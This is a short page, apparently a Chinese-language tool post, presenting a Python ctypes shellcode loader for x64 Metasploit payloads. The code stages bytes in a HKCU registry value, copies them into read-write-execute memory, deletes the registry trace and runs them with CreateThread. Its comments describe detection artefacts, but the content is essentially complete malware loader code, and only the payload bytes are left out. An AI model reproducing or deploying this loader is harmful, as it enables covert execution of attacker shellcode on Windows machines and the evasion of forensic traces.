python shellcode加载器

默认使用 x64(64 位)的 msf shellcode。

from ctypes import *
from ctypes import wintypes
import ctypes
# Walkthrough for analysts: this script stages a byte string in the registry,
# copies it back out into executable memory, and starts a thread on it.
# The behaviours a defender can observe are noted at each step.

# Payload bytes. Only three bytes appear on the page; presumably the rest was
# elided by the author (the page text says an x64 msf payload is the default).
buf =  b""
buf += b"\x56\xff\xd5"

# -2147483647 is 0x80000001 read as a signed 32-bit value, i.e. the predefined
# HKEY_CURRENT_USER handle, and type 3 is REG_BINARY. The call passes `buf` as
# the data for a value whose name argument is "test", directly on that root key.
# Detection: a script interpreter writing a REG_BINARY value at the HKCU root
# that is deleted again moments later (see RegDeleteValueA below).
ctypes.windll.Advapi32.RegSetValueExA(-2147483647, "test", None, 3, buf,len(buf))
# Declare VirtualAlloc's return type as a pointer; ctypes otherwise treats
# foreign-function return values as a C int.
LPBYTE = POINTER(c_byte)
ctypes.windll.kernel32.VirtualAlloc.restype = LPBYTE
# 800 bytes requested; 0x3000 = MEM_COMMIT | MEM_RESERVE and
# 0x40 = PAGE_EXECUTE_READWRITE.
# Detection: a private read-write-execute region inside an interpreter process.
ptr = ctypes.windll.kernel32.VirtualAlloc(0,800,0x3000,0x40)
# The first query passes a null data buffer, so only `data_len` is filled in;
# the second query passes `ptr` as the data buffer and reuses `data_len` as its size.
data_len = wintypes.DWORD()
ctypes.windll.Advapi32.RegQueryValueExA(-2147483647, "test", 0, 0, 0, byref(data_len))
ctypes.windll.Advapi32.RegQueryValueExA(-2147483647,"test",0,None,ptr,byref(data_len))
# The staging value is removed immediately after the read, so only registry
# telemetry captured at the time (value set / value delete events) records it.
ctypes.windll.Advapi32.RegDeleteValueA(-2147483647, "test")
# The allocated region is passed as the thread start address.
# Detection: a thread whose start address is in private memory not backed by
# any image on disk.
handle = ctypes.windll.kernel32.CreateThread(0, 0, ptr, 0, 0, 0)
# -1 is the INFINITE timeout: the script blocks here until the thread exits.
ctypes.windll.kernel32.WaitForSingleObject(handle, -1)